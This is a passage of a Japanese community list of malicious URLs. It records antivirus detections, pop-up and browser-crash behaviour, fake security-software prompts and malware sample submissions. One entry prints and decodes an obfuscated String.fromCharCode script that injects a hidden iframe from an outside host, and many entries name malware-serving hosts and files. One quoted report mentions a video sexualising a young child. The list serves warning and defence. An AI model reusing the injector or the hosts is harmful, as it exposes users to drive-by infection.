| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2005/07/18] | //lab-wire.com/user6/index.php に飛び、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。 |
| [2005/07/18] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
| [2008/12/26] | ウィルス名:TROJ_DLOADER.TYV |
| [2008/12/26] | ウィルス名:TROJ_EXCHANGE.CI |
| [2008/12/26] | ウィルス名:TROJ_AGENT.AFTY |
| [2008/12/26] | ウィルス名:TROJ_EXCHANGE.BK |
| [2005/04/24] | ツールバーインストール風の画面の後、海外アダルトサイトに行く。
怪しいポプアプが1つあり、閉じるとタスクバーにのみ表示されてるサイトが残る。 閉じようとすると海外アダルトサイトを何回か開いてくる。 アンチドートでウィルス名:Trojan-Downloader.JS.Small.af を検出するらしい。 |
| [2005/04/24] | 何回か確認。踏んでも動画は無く、一瞬、小窓が左上に表示されて閉じ、//www.hostsall.com/notfound/ に飛ぶ。
そして、間髪置いて //www.caribbeancom.com/eng/index2.htm のアダルトサイトに飛ぶ。バスター無反応。 |
| [2006/05/02] | 他の方の結果は以下の「」内。ちなみにバスターは無反応。
「Kaspersky反応あり。Trojan-Downloader.JS.IstBar.x 、Trojan-Downloader.JS.IstBar.ai 検出。 ClamWin反応あり。Trojan.Downloader.JS.IstBar.A-4 検出。 海外アダルトサイトや怪しいサイトが次々と開いていきます。」 |
| [2005/11/05] | 海外アダルトサイトを表示するが、同時にタスクバーのみに存在する下のタイトルの窓が現れる。
「Systray???????????????????????????????????????????」 この窓は最大化不可でURLは不明、閉じてもすぐに復活する。強制終了でも消えない窓であった。 この窓がタスクバーにあると、定期的+ランダム的に色々なアダルトサイトを呼んできて表示する。 そのランダムで呼ばれたサイトがブラクラ並に開くサイトだったり、ウィルス憑きサイトであったり、ウィルス+ブラクラ複合型サイトであったりする。 詳細は //vipinvest.net/index.php のURL解説を参照。 |
| [2005/11/07] | 「akl.zip」というファイルをDL出来る。ファイルサイズ:613KB 。
DLまでバスター無反応。解凍した途端、ウィルス名:SPYW_AKEYLOG.21 を検出。 解凍すると「FILE_ID.DIZ」「SETUP.EXE」の2つのファイルが現れるが、「SETUP.EXE」のほうからウィルスを検出。 正体はスパイウェア:キーロガーである。 |
| [2005/11/29] | TELNETストーム。 |
| [2009/07/05] | ファイルサイズ:21.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:20.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:26.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:26.1 KB 。ウィルス名:TROJ_BFVS.B |
| [2009/07/05] | ファイルサイズ:26.0 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:29.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:26.0 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:25.5 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:26.1 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:28.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:21.6 KB 。ウィルス名:TROJ_GAMETHI.EXW |
| [2009/07/05] | ファイルサイズ:22.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:22.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:25.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:27.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:25.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:27.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:28.1 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:38.0 KB 。ウィルス名:TROJ_GAMETHI.ELL |
| [2009/07/05] | ファイルサイズ:80.5 KB 。ウィルス名:TROJ_PAKES.ATR |
| [2009/07/05] | ファイルサイズ:25.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:27.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:22.1 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:23.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:26.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:21.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:23.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:26.6 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:27.5 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2009/07/05] | ファイルサイズ:26.6 KB 。ウィルス名:MAL_OLGM-23 |
| [2009/07/05] | ファイルサイズ:23.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
| [2006/10/29] | 踏むと「WinAntiVirus Pro 2006」をインストールしろ、と言ってきてウィルス名:ADW_WINFIXER.AS を検出。 |
| [2004/06/12] | mailtoストーム。FDDアタック。 |
| [2007/04/09] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1+JAVA_BYTEVER.K |
| [2007/04/10] | ウィルス名:EXPL_ANICMOO.N |
| [2007/04/10] | ウィルス名:JS_Generic |
| [2007/05/21] | 2007/04/10 にトレンドマイクロ社にファイルを提出。
2007/05/16 にその結果の連絡があり、ウィルス名:TROJ_DELF.FKK として検出するよう対応、とのこと。 実際に 2007/04/10 にDLしたファイルからウィルス名:TROJ_DELF.FKK を検出することを確認。 しかし、今日改めてDLしてみると、404 になっていた。 |
| [2007/05/21] | 2007/04/10 にトレンドマイクロ社にファイルを提出。
2007/05/16 にその結果の連絡があり、ウィルス名:CHM_CODEBASE.FD として検出するよう対応、とのこと。 実際に 2007/04/10 にDLしたファイルからウィルス名:CHM_CODEBASE.FD を検出することを確認。 しかし、今日改めてDLしてみると、404 になっていた。 |
| [2004/10/31] | 「香田ナン」という香田晋関係のFLASH。FLASH自体は無害。
踏むと、当方の環境では右下にタスクマネージャからでしか消せない小さなウィンドウが現れ、CPU使用率が異常に上がる。 |
| [2004/11/09] | スパイウェアの可能性。ポプアプがいくつか出てくる。SPYBOTでスキャンすると2つほど反応。 |
| [2005/04/10] | 踏んでみると、アダルトサイト。
相当な回数リロード(多分200回くらい)してウィルス名:TROJ_ISTBAR.CF を検出。 別窓が2枚、更にセキュリティ警告を表示して何かをDLさせようとしてくる。 セキュリティ警告音も繰り返し鳴る怪しい挙動。ウィルス反応したのは これ1回だけという結果。 その他、このサイトは非常に稀な確率で別窓1枚が表示されるようで、その別窓も色々あるらしい。 |
| [2005/04/11] | 上記で、ウィルス検出時の別窓2枚のうちの1枚は //lemonpop.vzz.net/root/mtpop.html と判明。詳細はこのURL解説を参照。 |
| [2005/07/21] | 他の方の鑑定結果は以下。
「海外サイトです。画像サイトへのリンクがいくつも張ってありますが、ランダムに数個踏んでみたけど、そこにはいけませんでした。 ウイルス反応は無かったけど勝手にひとつウインドウが開いたりと動作がおかしいです。」 「Kiken URL List によると相当な回数リロード(多分200回くらい)してウィルス名:TROJ_ISTBAR.CF を検出、とのことでした。 リロードは確認しましたが全然終わりません。途中でspybot反応。閉じるとカジノ関係の大きいサイズの窓が開きました。」 |
| [2005/12/30] | 「危険URLです。ページを延々と読み込んだままで読み込み終わりません。大窓のポップあり。リロードされる回数でウイルス検出の可能性あるようなので踏まないほうがいいでしょう。」 |
| [2006/01/03] | 「タグで別URLを開く仕掛けになってて、場合によってウィルス付きに飛ばされる。ゾンビウィンドウもあるので、どっちにしろ踏まないほうがいい。SP2ポップアップでブロックしていれば発動しないこともある。」 |
| [2006/10/21] | 「100% Japanese Candy SchoolGirls PICS というアダルトサイト 。
微エロ画像が多数貼られていますが、過去にこのサイトを踏んだ人からトロイの木馬を検出したと言う報告を聞いたことがあります。 また現在踏んだときに”Free_Internet_Security_Scan(CLICK_RUN).exe”と言う怪しげなファイルをダウンロードさせられました。 このファイルをスキャンしたところ、多数のアンチウイルスソフトが有害判定を出しています。 (例:VBA32 suspected of Trojan.StartPage.77)」 |
| [2005/04/11] | ウィルス名:TROJ_ISTBAR.CF
このセキュリティ警告 を表示し、「いいえ」を選ぶと この小窓 を表示。 最初の確認ではセキュリティ警告音が一定間隔で鳴りっぱなし。2回目以降の確認では一定間隔では鳴らず、通常通りの警告音だった。 その後、これ を表示し、「はい」を選ぶとウィンドウが閉じる。「いいえ」を選ぶと再びセキュリティ警告表示、の繰り返し。 |
| [2005/12/11] | 踏むと こんな感じ のサイト。音楽付きだが、普通に閉じれる。
別窓は これ と これ 。こっち の別窓は普通に閉じれるが、こっち のほうは曲者。 「キャンセル」を選ぶと こんな感じ のページを表示。よく見るとアドレスバーが無い。 このWinFixer2005のウィンドウを閉じると これ を表示。「キャンセル」を選ぶと これ を表示。「OK」を押すと これ を表示。 これ を見ると WinFixer2005 は「パソコンを修理・保護する」と書いてあるが、「パソコンに巣食うスパイウェア」なので注意。 |
| [2008/12/26] | ウィルス名:TROJ_EXCHANGE.BX |
| [2005/10/15] | 他の方の結果は以下。
Zippoライターを使って点火する時のワザを特集しているサイト。 当環境ではspybotがfastClickを検知。別窓で広告。ウィルス反応無し。 |
| [2005/10/15] | 踏むと こんな感じ のサイト。別窓は これ 。
最初の このサイト のソースの中に //media.fastclick.net/ に関係するスクリプトが仕組まれている。また、数分おきに何かを読みに行っている。 次に、この別窓 は画面全体がリンクになっている。「 Next > 」「 Cancel 」ボタンがあるが選択は出来ない。 別窓のどこでもいいからクリックすると こんな感じ のサイトを別窓表示する。 そのURLは//www.errorguard.com/?a=25268-23 そこは「ErrorGuard」という名の何かのexeをインストールするよう催促をするページで、画面内に「System Error Found : 47」とあるが、gif画像で出来ているので誰がこのページに行ってもエラーの数は47になる。 そして、この催促するexeから F-Prot Antivirus が "backdoor" program を検出。 |
| [2005/07/18] | ウィルス名:TROJ_HECTOR.A |
| [2005/03/22] | 踏むと真っ白なページだが、ウィルス名:JAVA_BYTEVER.A を検出。
よく見ると左上のほうにドットサイズの小さな黒い「点」がある。 その「点」は //more-pages.com/freepics.html を呼び出す「点」である。 詳細は //more-pages.com/freepics.html のURL解説を参照。 |
| [2005/04/27] | 踏むと こんな感じ のサイトだが、HDDがガリガリ言い出し、バスターがウィルス名:TSPY_LINEAGE.GEN を検出。
バスターのウィルス検出窓を閉じでもHDDがガリガリ言い続け、再びウィルス名:TSPY_LINEAGE.GENを検出。 すると、今度はタスクバーに現れない こんな小窓 を新窓表示。 ソースを見ると、IFRAMEタグで //www.gamecent.com/t1/ad.htm を縦0ドット、横0ドットの大きさで呼んでいる。詳細はこのURL解説を参照。 |
| [2006/07/28] | DL+解凍すると「autolineage.exe」ファイルが現れる。
2006/07/24 にトレンドマイクロ社に提出。今日、その結果の連絡があり、その結果は以下。 「ウイルスパターンファイル 3.595.00 にてウィルス名:TSPY_LINEAGE.AQV として対応しました。」 実際にファイルをDLしてウィルス名:TSPY_LINEAGE.AQV を検出することを確認。 |
| [2006/07/14] | ウィルス名:TROJ_DROPPER.BFP |
| [2004/07/15] | 無限JavaScript。一部XORで暗号化されている。 |
| [2007/01/05] | ウィルス名:WORM_MyDoom.DAM+WORM_MYDOOM.BU |
| [2007/01/05] | ウィルス名:PE_Magistr.B |
| [2007/01/05] | ウィルス名:WORM_SOBIG.F.DAM+WORM_SOBIG.F |
| [2007/01/05] | ウィルス名:PE_Magistr.B |
| [2007/01/05] | ウィルス名:WORM_Bagle.GEN-1 |
| [2007/01/15] | ウィルス名:PE_Magistr.B |
| [2007/01/15] | ウィルス名:WORM_BAGLE.GM |
| [2008/12/26] | ウィルス名:TROJ_EROTPICS.A |
| [2008/09/13] | ウィルス名:TSC_GENCLEAN+TROJ_TIBS.DFZ |
| [2006/09/03] | こんな感じ のページ。以下のexeをDLしろ、と催促してくる。
//www.pcodec.com/int/intcodec-v6.550.exe このexeにはバスター無反応だが、他社製アンチウィルスソフトでは Trojan-Downloader.Win32.Zlob.afe を検出するらしい。 |
| [2006/12/09] | ウィルス名:HKTL_ICQTOOLZ.A |
| [2006/12/09] | ウィルス名:JOKE_FLIPPED.A |
| [2007/01/10] | DL+解凍すると「BUGS.exe」ファイルが現れる。バスター無反応だが、いかのアンチウィルスソフトで反応。
Avast → 12.30.2006 Win32:Bugs BitDefender → Application.Joke.Bugs.A ClamAV → Joke.Bugs30 eSafe → Win32.Bugs.30 Ewido → Not-A-Virus.BadJoke.Win32.Bugs.30 Fortinet → W32/Bugs.30 Ikarus → not-a-virus:BadJoke.Win32.Bugs.30 Kaspersky → not-virus:BadJoke.Win32.Bugs.30 McAfee → potentially unwanted program Joke-Lady Panda → Joke/Bugs Sunbelt → BadJoke.Win32.Bugs.30 UNA → Joke.Win32.Bugs.30.C1B0 2006/12/09 にトレンドマイクロ社に「BUGS.exe」ファイルを提出。 2006/12/25 にその結果の連絡があり、「弊社では正常と判断したファイルで、対応は行わない。」とのこと。 |
| [2006/12/09] | ウィルス名:JOKE_CRZYMOUSE.A |
| [2007/04/29] | 2006/12/09 にトレンドマイクロ社に中身の「crazy_ncs.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:TROJ_DELF.DK として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DELF.DK を検出することを確認。 2006/12/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/07/28] | DL+解凍後に現れる「War3Demo.exe」に以下のアンチウィルスソフトで反応。
BitDefender → Application.Pup.A Ewido → Not-A-Virus.BadJoke.Win32.FakeDel.h Fortinet → W32/FakeDel Kaspersky → not-virus:BadJoke.Win32.FakeDel.h McAfee → potentially unwanted program Generic PUP Panda → Joke/Fakedel.A TheHacker → Aplicacion/FakeDel.h UNA 1.83 → Joke.Win32.FakeDel 2006/07/24 に、この「War3Demo.exe」をトレンドマイクロ社に提出。 今日、その結果の報告があり、「不正なコードを含まない正常なファイル」とのこと。 |
| [2006/12/09] | ウィルス名:TROJ_AENIMA.20 |
| [2007/01/10] | 2006/12/09 にトレンドマイクロ社に中身の「Bomb.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:HKTL_MAILBOMB.F として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:HKTL_MAILBOMB.F を検出することを確認。 2006/12/09 から今日まではファイルは置き換えられていないと推測される。 |
| [2006/12/09] | ウィルス名:TROJ_QFRYE |
| [2006/12/09] | ウィルス名:TROJ_SADAMME02.A |
| [2006/07/17] | ウィルス名:TROJ_UNABOMBER |
| [2006/12/09] | ウィルス名:TROJ_XBOMBER.A+JS_EXITW.A.DR |
| [2006/12/09] | ウィルス名:TROJ_DIVINE |
| [2006/12/09] | ウィルス名:TROJ_HAKTEK |
| [2007/04/29] | 2006/12/09 にトレンドマイクロ社に中身の「BATTLE~1.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:TROJ_FDOSBATT.10 として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_FDOSBATT.10 を検出することを確認。 2006/12/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:TROJ_NUKERBSLAP |
| [2006/12/09] | ウィルス名:TROJ_HANGUP.A |
| [2006/12/09] | ウィルス名:TROJ_LORNUKE.20 |
| [2006/12/09] | ウィルス名:TROJ_MELIKSAH.A |
| [2006/12/09] | ウィルス名:TROJ_WINNUKE.A |
| [2007/04/29] | 2006/12/09 にトレンドマイクロ社に中身の「MUERTE.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:TROJ_MUERTE.A として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_MUERTE.A を検出することを確認。 2006/12/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:TROJ_NUKER_V2.3 |
| [2006/12/09] | ウィルス名:TROJ_NUKEM |
| [2006/12/09] | ウィルス名:TROJ_NUKEATTK |
| [2006/12/09] | ウィルス名:TROJ_DOS.RAS.11 |
| [2006/07/17] | ウィルス名:TROJ_ROCKET.A |
| [2007/04/29] | 2006/12/09 にトレンドマイクロ社に中身の「voob.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:TROJ_VOOB.A として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_VOOB.A を検出することを確認。 2006/12/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:TROJ_VNUKE |
| [2006/12/09] | ウィルス名:BKDR_Generic |
| [2007/04/29] | このzipファイルの中身は「server.exe」「setup.exe」の2つのファイルが入っている。
2006/12/09 にトレンドマイクロ社に中身の「server.exe」ファイルを提出。 2006/12/25 にその結果の連絡があり、ウィルス名:TSPY_BAROK.AA として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BAROK.AA を検出することを確認。 2006/12/09 から今日までの「server.exe」ファイルの置き換えは無いと推測される。 2006/12/10 にトレンドマイクロ社に中身の「setup.exe」ファイルを提出。 2006/12/28 にその結果の連絡があり、ウィルス名:TROJ_BAROK.10 として検出するよう対応、とのこと。 実際に 2006/12/10 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BAROK.10 を検出することを確認。 2006/12/10 から今日までの「setup.exe」ファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:BKDR_COMA.A |
| [2006/07/17] | ウィルス名:TROJ_FATAL_ERR |
| [2007/04/29] | 2006/12/09 にトレンドマイクロ社に中身の「JokersFTPservinvsible.exe」ファイルを提出。
2006/12/25 にその結果の連絡があり、ウィルス名:BKDR_FTPPENG.A として検出するよう対応、とのこと。 実際に 2006/12/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:BKDR_FTPPENG.A を検出することを確認。 2006/12/09 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:BKDR_HACKTACK.12 |
| [2006/12/09] | ウィルス名:BKDR_HACKTACK.D+BKDR_HAC.A |
| [2006/12/09] | ウィルス名:BKDR_LAMESPY.095 |
| [2006/12/09] | ウィルス名:BKDR_NETBUS.C |
| [2006/12/09] | ウィルス名:TROJ_NETCONFIG |
| [2006/12/09] | ウィルス名:BKDR_NETCNTRL.20 |
| [2006/12/09] | ウィルス名:BKDR_NETDEMON.10 |
| [2006/12/09] | ウィルス名:BKDR_REMSTORM.12 |
| [2005/11/28] | ウィルス名:BKDR_RUXTICK.40B |
| [2006/12/09] | ウィルス名:BKDR_SBD.A |
| [2006/12/09] | ウィルス名:BKDR_SCBUS.B+BKDR_SCBUS.C |
| [2006/07/17] | ウィルス名:BKDR_SUB722.P+BKDR_SUB7.22A |
| [2007/04/29] | このzipファイルの中には「EditServer.exe」「server.exe」「SubSeven.exe」の3つのファイルが入っている。
2006/12/16 にトレンドマイクロ社に3つのファイルを提出。 2006/12/19 にその結果の連絡があり、3つのファイルともウィルス名:BKDR_SUB7.20 として検出するよう対応、とのこと。 実際に 2006/12/16 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:BKDR_SUB7.20 を検出することを確認。 2006/12/16 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/12/09] | ウィルス名:BKDR_ULLYSSE.A |
| [2006/12/09] | ウィルス名:BKDR_VAMPIRE.A |
| [2006/12/09] | ウィルス名:BKDR_Y3KRT.C+TROJ_Y3K14.A+BKDR_Y3KRAT.15 |
| [2010/03/21] | ファイルサイズ:27.6 KB 。かなり高い確率で、不正なファイルと判断。 |
| [2010/03/21] | ファイルサイズ:109 KB 。ウィルス名:TROJ_GEN.MZ40L4 |
| [2005/10/20] | TELNETストーム。 |
| [2005/10/21] | 他の方の結果は以下の「」内。
「最初、DVD販売ページのような感じでしたが、挙動不審のため暫く待つと、ウンコ画像+telnetストームのブラクラでした。」 |
| [2005/10/13] | TELNETストーム。 |
| [2005/10/15] | − 以下は鑑定結果を編集記載 −
「アンチウィルスによってはトロイ反応ありのtelnetストームのブラクラ発動ページ。 時間帯によっては有害。時間帯によって Error: Daily Bandwidth Allocation Exceeded と表示される。 発動した場合、一時キャッシュ削除後アンチウィルスソフト等でスキャンして、特に何もなければ大丈夫だと思います。」 |
| [2008/09/16] | 2008/09/07 にトレンドマイクロ社に解凍して現れた「0808033566_5linmovesmm.scr」ファイルを提出。
2008/09/15 に その結果の連絡があり、ウィルス名:TROJ_INJECT.MB として検出するよう対応、とのこと。 実際に 2008/09/07 にDLしたファイルからウィルス名:TROJ_INJECT.MB を検出することを確認。 しかし、今日改めて当該URLを調べてみるとバスター無反応。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2006/03/04] | ウィルス名:TROJ_KAKKEYS.K
他アンチウィルスソフトでは Trojan.Spy.Ruby.Kakkeys.A を検出するらしい。 また、同人板をスクリプト爆撃してるウィルスらしい。 |
| [2007/04/29] | ウィルス名:TROJ_KAKKEYS.K |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2005/08/08] | 海外アダルトサイト。バスター無反応だが、AVGでトロイの木馬を検出するらしい。 |
| [2005/08/07] | 海外アダルトサイトだが、ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.Aを検出。
別窓が数枚開くが、最終的には別窓は//82.179.166.2/free_default.phpの1枚のみになる。 以下のURLと関連している。それぞれのURL解説を参照。 //highconvert.com/system/users/dimpy/ ← IFRAMEタグで呼び出し。 //girlsteens.net/go.php ← IFRAMEタグで呼び出し。 //lo.dorki.info/cj_out.php ← JavaScriptで呼び出し。 |
| [2005/08/07] | ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.A+TROJ_DLOADER.XH
以下のURLと関連している。1. と 2. のURL解説も参照。
<script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105, 102,114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100, 116,104,61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108, 101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,32,115, 114,99,61,39,104,116,116,112,58,47,47,118,120,105,102,114,97,109, 101,46,98,105,122,47,97,100,118,101,114,116,115,47,48,55,52,47,49, 46,112,104,112,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を復号化すると下のようになる。//vxiframe.biz/adverts/074/1.phpのURL解説も参照。 ↓ <script language=javascript>eval(String.fromCharCode( document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://vxiframe.biz/adverts/074/1.php'></iframe>")))</script> |
| [2010/03/21] | ファイルサイズ:223 KB 。不正なファイルの可能性がある。 |
| [2005/12/18] | DL+解凍すると以下の2つのファイルが現れる。ともにバスター無反応。
@、「UWFX5S_0001_N56M1711NetInstaller.exe」 ← スパイウェア。 A、「UWFX5S_0001_N56M1711NetInstaller.inf」 ← セットアップ情報。 ↑ @ のexeは以下のアンチウィルスソフトで反応。 Dr.Web → Program.Winfixer NOD32 → a variant of Win32/Downloader.Agent application VBA32 → Downloader.Agent.1 |
| [2007/05/18] | ウィルス名:TROJ_GENERIC |
| [2008/09/14] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_RENOS.AEX |
| [2005/03/25] | 踏むと //lol.fozya.com/guestbook/guestbook.shtml に飛ばされる。詳細はこのURL解説を参照。 |
| [2005/03/25] | 踏むと こんな感じ のページ。別窓で //uxi.ru/top/?id=1478 のリンクページを表示。別窓は普通に閉じれる。
何回か確認すると検出されるウィルス数などが違っていた。3回ほど確認。 1回目、ウィルス名:JAVA_BYTEVER.A を5つ検出。 2回目、ウィルス名:JAVA_BYTEVER.A を3つ検出。 3回目、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。 これを閉じると@とAの別窓が2枚。更にそのうちBも別窓表示。 @、//www.fuck-you.ru/index.html ← 海外リンクページ。普通に閉じれる。 A、//www.pornosextop.com/index.html ← リンクページのようだが文字化けして分からず。閉じると「ページを表示できません」の別窓。 B、//www.sexuniform.ru/cd/?pid=0017 ← 海外アダルトサイト。普通に閉じれる。 |
| [2007/04/16] | 海外アダルトサイトだが、ウィルス名:EXPL_ANICMOO.GEN を検出。 |
| [2006/06/24] | 海外アダルトサイト。バスター無反応だが、他アンチウィルスソフトではウィルス反応があると思われる。
ソースを見ると以下のURLをIFRAMEタグで呼び出している。 //lol.to/add.php?bbs=gastboeknl&action=new&pg=1 |
| [2006/06/24] | 他の方の結果は以下の「」内。
「iframe で読み込まれる、html が、BitDefender にて、Trojan.JS.RunBof.A と判定されました。 ネットワークケーブルを外して、IEのキャッシュやクッキーの削除、ウィルス・スキャンをする事をお勧めします。 また、C:ドライブ直下に MAIN.MHT! と言うファイルが作成されていないでしょうか。もし有れば、削除してください。 Trojanと判定された、html を内容を見ると、OS、ブラウザ、ジャバのバージョンをチェックして更に読込むファイル等を選択しているようです。 環境によって受ける被害も違う可能性があります。 また、以前、このURI類似のURIより、ダウンロードされた動画が EXPL_WMF.GEN と判定されていました。 Psycho_Girl.wmv だと思いますが、これもあれば削除しておく事をお勧めします。」 |
| [2006/06/24] | 海外アダルトサイト。バスター無反応だが、他アンチウィルスソフトではウィルス反応があると思われる。
ソースを見ると以下の2つのURLをIFRAMEタグで呼び出している。 //www.nigga.mews.ru/ie0601.htm //195.225.176.34/stat2/0034/index.php |
| [2006/01/27] | 海外アダルトサイト。バスター無反応だが、マカフィーで Adware-DollarRevenue を検出するらしい。 |
| [2006/02/13] | 海外アダルトサイト。ウィルス名:EXPL_WMF.GEN+JAVA_BYTEVER.A
「res.wmf」ファイルを繰り返しDLしろ、と言ってきて、その度にウィルス名:EXPL_WMF.GEN を検出する。 |
| [2006/01/27] | 海外アダルトサイト。バスター無反応だが、マカフィーで Adware-DollarRevenue を検出するらしい。 |
| [2005/09/27] | 海外アダルトサイト。リンクページのよう。
HDDが唸り出し、ウィルス名:JS_INOR.ABを検出。 |
| [2005/10/26] | 海外アダルトサイト。HDDが唸り出し、この別窓 を表示しつつ、ウィルス名:JS_INOR.AB を検出。その後もHDDが唸り続き、少し経つとウィルス名:VBS_PSYME.AN を検出。
閉じると //www.otsos.ru/index2.htm を表示する。以下は他の方の結果。 「複数のウイルス反応、ゾンビウインドウ有り。危険URLを呼び出してます。」 「呼び出されるページにスパイウェアがありそうです。踏まれた方は一応チェック推奨です。」 「McAfeeでは、下記3種類のトロイを検出しました。「Exploit-MhtRedir」「VBS/Psyme」「Exploit-ByteVerify」」 |
| [2006/02/07] | こんな感じ のページ。何かをインストールしろ、と言ってくる。また、「res.wmf」ファイルをDLしろ、とも言ってくる。
ソースを見るとIFRAMEタグで、以下の2つのURLを呼び出している。 //toolbarnew.biz/dl/adv659.php //lol.to/add-gb.php?book=omalol&action=new&pg=1 |
| [2005/10/26] | 海外アダルトサイト。HDDが唸り出し、この別窓 を表示しつつ、ウィルス名:JS_INOR.AB を検出。その後もHDDが唸り続き、少し経つとウィルス名:VBS_PSYME.AN を検出。
閉じると //www.otsos.ru/index2.htm を表示する。以下は他の方の結果。 「複数のウイルス反応、ゾンビウインドウ有り。危険URLを呼び出してます。」 「呼び出されるページにスパイウェアがありそうです。踏まれた方は一応チェック推奨です。」 「McAfeeでは、下記3種類のトロイを検出しました。「Exploit-MhtRedir」「VBS/Psyme」「Exploit-ByteVerify」」 |
| [2006/02/13] | 海外アダルトサイト。ウィルス名:EXPL_WMF.GEN+JAVA_BYTEVER.A
「res.wmf」ファイルを繰り返しDLしろ、と言ってきて、その度にウィルス名:EXPL_WMF.GEN を検出する。 |
| [2006/02/07] | 別窓1枚付きの海外アダルトサイトだが、ウィルス名:EXPL_WMF.GEN+JAVA_BYTEVER.A を検出。
ソースを見るとIFRAMEタグで、以下のURLを呼び出している。 //traff-store.com/gallery20075/l2/ |
| [2006/02/26] | 踏むと こんな感じ のサイト。動画が見れる。
同時に「res.wmf」ファイルをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN を検出。その約10秒後にウィルス名:JAVA_BYTEVER.A を検出する。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //traffnew.biz/dl/adv659.php ↑ ちなみにこのURLを確認してみると、ソースが2つある模様。詳細はこのURL List解説を参照。 |
| [2006/02/26] | 他の方の結果は以下の「」内。
「外国人の幼い子がきわどいポーズをする動画でした。PC有害。 Win32/Exploit.WMF 、Java/Exploit.Bytverify.F 早急に対応された方が良いです。 まずは一時ファイルをきれいにしてください。」 |
| [2006/03/01] | 以下は踏まれた方のレス。
